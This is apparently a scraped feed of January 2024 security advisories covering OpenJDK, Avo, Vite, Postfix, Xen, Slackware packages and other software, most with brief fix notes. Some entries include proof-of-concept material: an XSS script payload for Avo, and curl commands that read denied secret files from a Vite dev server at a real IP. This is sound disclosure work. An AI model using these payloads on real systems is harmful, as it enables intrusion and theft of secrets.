The java-11-openjdk packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

Security Fix(es):

* OpenJDK: array out-of-bounds access due to missing range check in C1 compiler (8314468) (CVE-2024-20918)
* OpenJDK: RSA padding issue and timing side-channel attack against TLS (8317547) (CVE-2024-20952)
* OpenJDK: JVM class file verifier flaw allows unverified bytecode execution (8314295) (CVE-2024-20919)
* OpenJDK: range check loop optimization issue (8314307) (CVE-2024-20921)
* OpenJDK: arbitrary Java code execution in Nashorn (8314284) (CVE-2024-20926)
* OpenJDK: logging of digital signature private keys (8316976) (CVE-2024-20945)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0266
18.01.2024 13:48:55 | rubysec | [RUBYSEC:AVO-2024-22411] Cross-site scripting (XSS) in Action messages on Avo (medium)
Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12 any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user.

This issue has been addressed in the 3.0.2 release of Avo. Users are advised to upgrade.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:AVO-2024-22411

18.01.2024 15:40:17 | rubysec | [RUBYSEC:AVO-2024-22191] avo vulnerable to stored cross-site scripting (XSS) in key_value field (high)
### Summary

A **stored cross-site scripting (XSS)** vulnerability was found in the **key_value** field of Avo v3.2.3. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the victim's browser.

### Details

The value of the key_value is inserted directly into the HTML code. In the current version of Avo (possibly also older versions), the value is not properly sanitized before it is inserted into the HTML code. This vulnerability can be exploited by an attacker to inject malicious JavaScript code into the key_value field. When a victim views the page containing the malicious code, the code will be executed in their browser.

In [avo/fields/common/key_value_component.html.erb](https://github.com/avo-hq/avo/blob/main/app/components/avo/fields/common/key_value_component.html.erb#L38C21-L38C33) the value is taken in lines **38** and **49** and seems to be interpreted directly as html in lines **44** and **55**.

### PoC

![POC](https://user-images.githubusercontent.com/26570201/295596307-5d4f563e-99c0-4981-a82e-fc42cfd902c5.gif)

To reproduce the vulnerability, follow these steps:

1. Edit an entry with a key_value field.
2. Enter the following payload into the value field: ```POC\\\"> <script>alert('XSS in key_value' );</script> <strong>Outside-tag</strong```
3. Save the entry.
4. Go to the index page and click on the eye icon next to the entry.

The malicious JavaScript code will be executed and an alert box will be displayed.

_On the show and edit page the alert seems not to pop up, but the strong tag breaks out of the expected html tag_

### Impact

This vulnerability could be used to steal sensitive information from victims that could be used to hijack victims' accounts or redirect them to malicious websites.
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:AVO-2024-22191

18.01.2024 10:00:00 | msrc | [MS:CVE-2024-0333] Chromium: CVE-2024-0333 Insufficient data validation in Extensions (medium)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-0333

18.01.2024 10:00:00 | msrc | [MS:CVE-2024-20675] Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability (low)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20675

18.01.2024 10:00:00 | msrc | [MS:CVE-2024-20721] Adobe Systems Incorporated: CVE-2024-20721 Improper Input Validation Denial of Service Vulnerability (moderate)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20721

18.01.2024 10:00:00 | msrc | [MS:CVE-2024-20709] Adobe Systems Incorporated: CVE-2024-20709 Javascript Implementation PDF Vulnerability (medium)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-20709

18.01.2024 10:00:00 | msrc | [MS:CVE-2024-21337] Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability (moderate)
https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21337
20.01.2024 00:07:48 | npm | [NPM:GHSA-WG2X-RV86-MMPX] SPV Merkle proof malleability allows the maintainer to prove invalid transactions (high)
## Summary

By publishing specially crafted transactions on the Bitcoin blockchain, the SPV maintainer can produce seemingly valid SPV proofs for fraudulent transactions.

The issue was originally identified by Least Authority in the tBTC Bridge V2 Security Audit Report as _Issue B: Bitcoin SPV Merkle Proofs Can Be Faked_. A mitigation was believed to have been in place, but this turned out to contain an error, and the issue had not been effectively mitigated.

### Details

This is achieved by creating a 64-byte transaction that the fraudulent transaction treats as a node in its merkle proof:

The attacker creates the malicious transaction `E` and calculates an unusual but valid transaction `D`, so that the last 32 bytes of `D` are a part of the merkle proof of `E`:

```
D = foo | hash256(E')
E' = bar | hash256(E)
```

`foo` and `bar` are arbitrary 32-byte values selected to facilitate this attack.

The attacker can then publish `D` and wait for it to be mined. A valid SPV proof for `D` can then be transformed into a proof for `E` by prepending `bar` and `foo` to the merkle proof, and changing the transaction index into one matching `E`'s implied position in the merkle tree.

Calculating a suitable value for `E'` has been estimated to require between 2^60 to 2^81 operations. By contrast, the current Bitcoin hashrate is approximately 2^69. Thus the cost of performing the requisite brute-force is at most similar to, or possibly up to 1,000,000 times lower than, the cost of mining 6 Bitcoin blocks at the current difficulty.

### Impact

The vulnerability does not enable the SPV maintainer to do anything they would not have been able to do otherwise. However, the ability to bypass the need to mine 6 blocks at the current difficulty makes abusing the SPV maintainer position significantly cheaper.

### Patches

Adding the coinbase transaction and its merkle proof into the SPV proofs prevents this issue, by increasing the brute-force required to 2^224. If the length of the coinbase proof matches the length of the transaction proof, and both proofs are valid for the same header, we can trust that the exploit has not been abused for the transaction.

### Workarounds

The trusted SPV maintainer position prevents this issue.

### References

[Weaknesses in Bitcoin's Merkle Root Construction](https://lists.linuxfoundation.org/pipermail/bitcoin-dev/attachments/20190225/a27d8837/attachment-0001.pdf)
[Leaf-Node weakness in Bitcoin Merkle Tree Design](https://bitslog.com/2018/06/09/leaf-node-weakness-in-bitcoin-merkle-tree-design/)
[SPV proof verification vulnerable to potential (but expensive to exploit) Merkle tree problem #192](https://github.com/summa-tx/bitcoin-spv/issues/192)
[tBTC Bridge V2 Security Audit Report](https://leastauthority.com/static/publications/LeastAuthority_KeepNetwork_tBTC_Bridge_v2_Updated_Final_Audit_Report.pdf)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WG2X-RV86-MMPX
19.01.2024 23:58:48 | npm | [NPM:GHSA-C24V-8RFC-W8VW] Vite dev server option `server.fs.deny` can be bypassed when hosted on case-insensitive filesystem (high)
### Summary

[Vite dev server option](https://vitejs.dev/config/server-options.html#server-fs-deny) `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows.

This bypass is similar to https://nvd.nist.gov/vuln/detail/CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems.

### Patches

Fixed in vite@5.0.12, vite@4.5.2, vite@3.2.8, vite@2.9.17

### Details

Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate, a blacklist bypass is possible. See `picomatch` usage, where `nocase` is defaulted to `false`: https://github.com/vitejs/vite/blob/v5.1.0-beta.1/packages/vite/src/node/server/index.ts#L632

By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files.

### PoC

**Setup**

1. Created vanilla Vite project using `npm create vite@latest` on a Standard Azure hosted Windows 10 instance.
   - `npm run dev -- --host 0.0.0.0`
   - Publicly accessible for the time being here: http://20.12.242.81:5173/
2. Created dummy secret files, e.g. `custom.secret` and `production.pem`
3. Populated `vite.config.js` with

```javascript
export default { server: { fs: { deny: ['.env', '.env.*', '*.{crt,pem}', 'custom.secret'] } } }
```

**Reproduction**

1. `curl -s http://20.12.242.81:5173/@fs//`
   - Descriptive error page reveals absolute filesystem path to project root
2. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/vite.config.js`
   - Discoverable configuration file reveals locations of secrets
3. `curl -s http://20.12.242.81:5173/@fs/C:/Users/darbonzo/Desktop/vite-project/custom.sEcReT`
   - Secrets are directly accessible using case-augmented version of filename

**Proof**

![Screenshot 2024-01-19 022736](https://user-images.githubusercontent.com/907968/298020728-3a8d3c06-fcfd-4009-9182-e842f66a6ea5.png)

### Impact

**Who**
- Users with exposed dev servers on environments with case-insensitive filesystems

**What**
- Files protected by `server.fs.deny` are both discoverable, and accessible
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-C24V-8RFC-W8VW
19.01.2024 17:06:08 | npm | [NPM:GHSA-RH63-9QCF-83GF] Marvin Attack of RSA and RSAOAEP decryption in jsrsasign (high)
### Impact

RSA PKCS#1.5 or RSAOAEP ciphertexts may be decrypted by this Marvin attack vulnerability.

### Patches

update to jsrsasign 11.0.0.

### Workarounds

Find and replace RSA and RSAOAEP decryption with other crypto library.

### References

https://people.redhat.com/~hkario/marvin/
https://github.com/kjur/jsrsasign/issues/598
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RH63-9QCF-83GF

18.01.2024 23:51:54 | opensuse | [openSUSE-SU-2024:0025-1] Security update for chromium (critical)
Security update for chromium
https://secdb.nttzen.cloud/security-advisory/opensuse/openSUSE-SU-2024:0025-1

20.01.2024 16:46:26 | almalinux | [ALSA-2024:0266] java-11-openjdk security update (important)
java-11-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0266

20.01.2024 13:28:21 | almalinux | [ALSA-2024:0248] java-21-openjdk security update (important)
java-21-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0248

20.01.2024 16:52:20 | almalinux | [ALSA-2024:0265] java-1.8.0-openjdk security and bug fix update (important)
java-1.8.0-openjdk security and bug fix update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0265

20.01.2024 16:58:06 | almalinux | [ALSA-2024:0249] java-21-openjdk security update (important)
java-21-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0249

20.01.2024 16:39:46 | almalinux | [ALSA-2024:0267] java-17-openjdk security and bug fix update (important)
java-17-openjdk security and bug fix update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0267
21.01.2024 22:53:54 | slackware | [SSA:2024-021-01] tigervnc (high)

New tigervnc packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
extra/tigervnc/tigervnc-1.12.0-i586-5_slack15.0.txz: Rebuilt.
  Recompiled against xorg-server-1.20.14, including the latest patches for
  several security issues.
  Thanks to marav.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-6377
    https://www.cve.org/CVERecord?id=CVE-2023-6478
    https://www.cve.org/CVERecord?id=CVE-2023-6816
    https://www.cve.org/CVERecord?id=CVE-2024-0229
    https://www.cve.org/CVERecord?id=CVE-2024-0408
    https://www.cve.org/CVERecord?id=CVE-2024-0409
    https://www.cve.org/CVERecord?id=CVE-2024-21885
    https://www.cve.org/CVERecord?id=CVE-2024-21886
    https://www.cve.org/CVERecord?id=CVE-2024-21886
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/extra/tigervnc/tigervnc-1.12.0-i586-5_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/extra/tigervnc/tigervnc-1.12.0-x86_64-5_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/extra/tigervnc/tigervnc-1.13.1-i586-3.txz

Updated packages for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/extra/tigervnc/tigervnc-1.13.1-x86_64-3.txz

**MD5 signatures**

Slackware 15.0 package:
13a4377260bd096461166e37ca16afe7  tigervnc-1.12.0-i586-5_slack15.0.txz

Slackware x86_64 15.0 package:
a942377a4d2c2b4b80a556eb81e5d97f  tigervnc-1.12.0-x86_64-5_slack15.0.txz

Slackware -current package:
2716715cb2d3d87c4eeb0141d2e1b7ae  tigervnc-1.13.1-i586-3.txz

Slackware x86_64 -current package:
2cd2eb06417478d62768c6f0a67f9550  tigervnc-1.13.1-x86_64-3.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg tigervnc-1.12.0-i586-5_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-021-01

21.01.2024 16:51:38 | rustsec | [RUSTSEC-2024-0004] `cosmwasm` is unmaintained

The crate `cosmwasm` is [not used anymore] since spring 2020.

The functionality was split in multiple different crates, such as the standard library `cosmwasm-std` and the virtual machine `cosmwasm-vm`. An overview can be found in the [cosmwasm repository].

If you have this crate in your dependency tree, this is very likely by mistake and should be corrected.

[not used anymore]: https://github.com/CosmWasm/cosmwasm/issues/1430
[cosmwasm repository]: https://github.com/CosmWasm/cosmwasm

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0004

22.01.2024 23:02:39 | slackware | [SSA:2024-022-01] postfix

New postfix packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/postfix-3.6.14-i586-1_slack15.0.txz: Upgraded.
  Security (inbound SMTP smuggling): with "smtpd_forbid_bare_newline =
  normalize" (default "no" for Postfix < 3.9), the Postfix SMTP server
  requires the standard End-of-DATA sequence <CR><LF>.<CR><LF>, and
  otherwise allows command or message content lines ending in the
  non-standard <LF>, processing them as if the client sent the standard
  <CR><LF>. The alternative setting, "smtpd_forbid_bare_newline = reject"
  will reject any command or message that contains a bare <LF>, and is
  more likely to cause problems with legitimate clients. For backwards
  compatibility, local clients are excluded by default with
  "smtpd_forbid_bare_newline_exclusions = $mynetworks".
  For more information, see:
    https://www.postfix.org/smtp-smuggling.html
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/postfix-3.6.14-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/postfix-3.6.14-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/postfix-3.8.5-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/postfix-3.8.5-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
294738922ff08821267867f0bc877f20  postfix-3.6.14-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
e82bb102cc325850e48aca41f909e812  postfix-3.6.14-x86_64-1_slack15.0.txz

Slackware -current package:
7e088581a14eb986f767bc08d9203103  n/postfix-3.8.5-i586-1.txz

Slackware x86_64 -current package:
50f7d14d0ddc0ce62e29cb55a2cffa31  n/postfix-3.8.5-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg postfix-3.6.14-i586-1_slack15.0.txz`

Restart the postfix server:
`# /etc/rc.d/rc.postfix restart`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-022-01

22.01.2024 20:30:00 | xen | [XSA-448] Linux: netback processing of zero-length transmit fragment

**ISSUE DESCRIPTION**

Transmit requests in Xen's virtual network protocol can consist of multiple parts. While not really useful, except for the initial part any of them may be of zero length, i.e. carry no data at all. Besides a certain initial portion of the to-be-transferred data, these parts are directly translated into what Linux calls SKB fragments. Such converted request parts can, when for a particular SKB they are all of length zero, lead to a de-reference of NULL in core networking code.

**IMPACT**

An unprivileged guest can cause Denial of Service (DoS) of the host by sending network packets to the backend, causing the backend to crash. Data corruption or privilege escalation have not been ruled out.

**VULNERABLE SYSTEMS**

All systems using a Linux based network backend with kernel 4.14 and newer are vulnerable. Earlier versions may also be vulnerable. Systems using other network backends are not known to be vulnerable.

https://secdb.nttzen.cloud/security-advisory/xen/XSA-448

22.01.2024 15:16:42 | ubuntu | [USN-6593-1] GnuTLS vulnerabilities (medium)
Several security issues were fixed in GnuTLS.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6593-1

22.01.2024 15:13:33 | ubuntu | [USN-6587-2] X.Org X Server vulnerabilities (high)
Several security issues were fixed in X.Org X Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6587-2

22.01.2024 15:05:30 | ubuntu | [USN-6592-1] libssh vulnerabilities (medium)
Several security issues were fixed in libssh.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6592-1

22.01.2024 14:35:30 | ubuntu | [USN-6591-1] Postfix vulnerability (medium)
Postfix could allow bypass of email authentication if it received specially crafted network traffic.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6591-1

22.01.2024 23:25:53 | maven | [MAVEN:GHSA-JGXC-8MWQ-9XQW] Clojure classes can be used to craft a serialized object that runs arbitrary code on deserialization (critical)
In Clojure before 1.9.0, classes can be used to construct a serialized object that executes arbitrary code upon deserialization. This is relevant if a server deserializes untrusted objects.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JGXC-8MWQ-9XQW

22.01.2024 10:01:31 | almalinux | [ALSA-2024:0310] openssl security update (moderate)
openssl security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0310

22.01.2024 02:00:00 | cisa | [CISA-2024:0122] CISA Adds One Known Exploited Vulnerability to Catalog (critical)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0122

22.01.2024 02:00:00 | gentoo | [GLSA-202401-26] Apache XML-RPC: Multiple Vulnerabilities (normal)
Multiple vulnerabilities have been found in Apache XML-RPC, the worst of which could result in arbitrary code execution.
https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202401-26

22.01.2024 02:00:00 | oraclelinux | [ELSA-2024-0267] java-17-openjdk security and bug fix update (important)
[1:17.0.10.0.7-2.0.1]
- Rebase to 17.0.10.0.7
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0267

22.01.2024 02:00:00 | redhat | [RHSA-2024:0310] openssl security update (moderate)
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
* openssl: Incorrect cipher key and IV length processing (CVE-2023-5363)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0310

22.01.2024 02:00:00 | redhat | [RHSA-2024:0320] xorg-x11-server security update (important)
X.Org is an open-source implementation of the X Window System. It provides the basic low-level functionality that full-fledged graphical user interfaces are designed upon.
Security Fix(es):
* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)
* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)
* xorg-x11-server: SELinux unlabeled GLX PBuffer (CVE-2024-0408)
* xorg-x11-server: SELinux context corruption (CVE-2024-0409)
* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)
* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0320

22.01.2024 23:32:19 | npm | [NPM:GHSA-FH38-9FGR-454W] Cross-site Scripting in Ghost (moderate)
Ghost before 5.76.0 allows XSS via a post excerpt in excerpt.js. An XSS payload can be rendered in post summaries.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FH38-9FGR-454W

22.01.2024 07:34:54 | rustsec | [RUSTSEC-2024-0006] Multiple issues involving quote API

## Issue 1: Failure to quote characters

Affected versions of this crate allowed the bytes `{` and `\xa0` to appear unquoted and unescaped in command arguments.

If the output of `quote` or `join` is passed to a shell, then what should be a single command argument could be interpreted as multiple arguments.

This does not *directly* allow arbitrary command execution (you can't inject a command substitution or similar). But depending on the command you're running, being able to inject multiple arguments where only one is expected could lead to undesired consequences, potentially including arbitrary command execution.

The flaw was corrected in version 1.2.1 by escaping additional characters. Updating to 1.3.0 is recommended, but 1.2.1 offers a more minimal fix if desired.

Workaround: Check for the bytes `{` and `\xa0` in `quote`/`join` input or output.

(Note: `{` is problematic because it is used for glob expansion. `\xa0` is problematic because it's treated as a word separator in [specific environments][solved-xa0].)

## Issue 2: Dangerous API w.r.t. nul bytes

Version 1.3.0 deprecates the `quote` and `join` APIs in favor of `try_quote` and `try_join`, which behave the same except that they have a `Result` return type, returning `Err` if the input contains nul bytes.

Strings containing nul bytes generally cannot be used in Unix command arguments or environment variables, and most shells cannot handle nul bytes even internally. If you try to pass one anyway, then the results might be security-sensitive in uncommon scenarios. [More details here.][nul-bytes]

Due to the low severity, the behavior of the original `quote` and `join` APIs has not changed; they continue to allow nuls.

Workaround: Manually check for nul bytes in `quote`/`join` input or output.

## Issue 3: Lack of documentation for interactive shell risks

The `quote` family of functions does not and cannot escape control characters. With non-interactive shells this is perfectly safe, as control characters have no special effect. But if you are writing directly to the standard input of an interactive shell (or through a pty), then control characters [can cause misbehavior including arbitrary command injection.][control-characters]

This is essentially unfixable, and has not been patched. But as of version 1.3.0, documentation has been added.

Future versions of `shlex` may add API variants that avoid the issue at the cost of reduced portability.

[solved-xa0]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#solved-xa0
[nul-bytes]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#nul-bytes
[control-characters]: https://docs.rs/shlex/latest/shlex/quoting_warning/index.html#control-characters-interactive-contexts-only

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0006

22.01.2024 23:24:45 | maven | [MAVEN:GHSA-9RHQ-86FM-QXQC] Hard-coded credentials in org.folio:mod-data-export-spring (high)
Hard-coded credentials in FOLIO mod-data-export-spring versions before 1.5.4 and from 2.0.0 to 2.0.2 allow unauthenticated users to access critical APIs, modify user data, modify configurations including single-sign-on, and manipulate fees/fines.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9RHQ-86FM-QXQC

22.01.2024 23:31:05 | maven | [MAVEN:GHSA-HJ55-9JMV-9JRJ] Sandbox escape in Artemis Java Test Sandbox (moderate)
Artemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HJ55-9JMV-9JRJ

22.01.2024 23:25:13 | maven | [MAVEN:GHSA-C4PG-5GGH-VCPP] Sandbox escape in Artemis Java Test Sandbox (high)
Artemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-C4PG-5GGH-VCPP

24.01.2024 07:03:37 | slackware | [SSA:2024-023-02] mozilla-thunderbird

New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.7.0/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-04/
    https://www.cve.org/CVERecord?id=CVE-2024-0741
    https://www.cve.org/CVERecord?id=CVE-2024-0742
    https://www.cve.org/CVERecord?id=CVE-2024-0746
    https://www.cve.org/CVERecord?id=CVE-2024-0747
    https://www.cve.org/CVERecord?id=CVE-2024-0749
    https://www.cve.org/CVERecord?id=CVE-2024-0750
    https://www.cve.org/CVERecord?id=CVE-2024-0751
    https://www.cve.org/CVERecord?id=CVE-2024-0753
    https://www.cve.org/CVERecord?id=CVE-2024-0755
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.7.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.7.0-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.7.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
c973c630024420493821cc1de3621f4c  mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
19d0d370f4b37d7e656ad15f7b8ba658  mozilla-thunderbird-115.7.0-x86_64-1_slack15.0.txz

Slackware -current package:
89beaf8081d0fd670f3aef2399e0704c  xap/mozilla-thunderbird-115.7.0-i686-1.txz

Slackware x86_64 -current package:
51dc2baf46f4656f72201f335a7ce1be  xap/mozilla-thunderbird-115.7.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.7.0-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-023-02

23.01.2024 22:15:17 | slackware | [SSA:2024-023-01] mozilla-firefox

New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.7.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2024-02/
    https://www.cve.org/CVERecord?id=CVE-2024-0741
    https://www.cve.org/CVERecord?id=CVE-2024-0742
    https://www.cve.org/CVERecord?id=CVE-2024-0746
    https://www.cve.org/CVERecord?id=CVE-2024-0747
    https://www.cve.org/CVERecord?id=CVE-2024-0749
    https://www.cve.org/CVERecord?id=CVE-2024-0750
    https://www.cve.org/CVERecord?id=CVE-2024-0751
    https://www.cve.org/CVERecord?id=CVE-2024-0753
    https://www.cve.org/CVERecord?id=CVE-2024-0755
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.7.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.7.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.7.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
570da9d6b89f74e5cbffbb710f67b808  mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
7f9fb29d0e70cfb0657b5c1daec04b2b  mozilla-firefox-115.7.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
072c32ab7c1e31596d535e0d8ed3df71  xap/mozilla-firefox-115.7.0esr-i686-1.txz

Slackware x86_64 -current package:
737830d32596d7c6fa544f22babad0f4  xap/mozilla-firefox-115.7.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.7.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-023-01

23.01.2024 22:10:22 | maven | [MAVEN:GHSA-7Q8P-9953-PXVR] Remote Command Execution in SOFARPC (critical)

### Impact
SOFARPC defaults to using the SOFA Hessian protocol to deserialize received data, while the SOFA Hessian protocol uses a blacklist mechanism to restrict deserialization of potentially dangerous classes for security protection. But there is a gadget chain that can bypass the SOFA Hessian blacklist protection mechanism, and this gadget chain only relies on the JDK and does not rely on any third-party components.

### Patches
Fixed this issue by adding a blacklist; users can upgrade to sofarpc version 5.12.0 to avoid this issue.

### Workarounds
SOFARPC also provides a way to add an additional blacklist. Users can add some class like -Drpc_serialize_blacklist_override=org.apache.xpath. to avoid this issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7Q8P-9953-PXVR

23.01.2024 22:11:28 | maven | [MAVEN:GHSA-V9WR-2XRG-V7W8] Cross-site Scripting in beetl-bbs (moderate)
Cross Site Scripting (XSS) vulnerability in beetl-bbs 2.0 allows attackers to run arbitrary code via the /index keyword parameter.
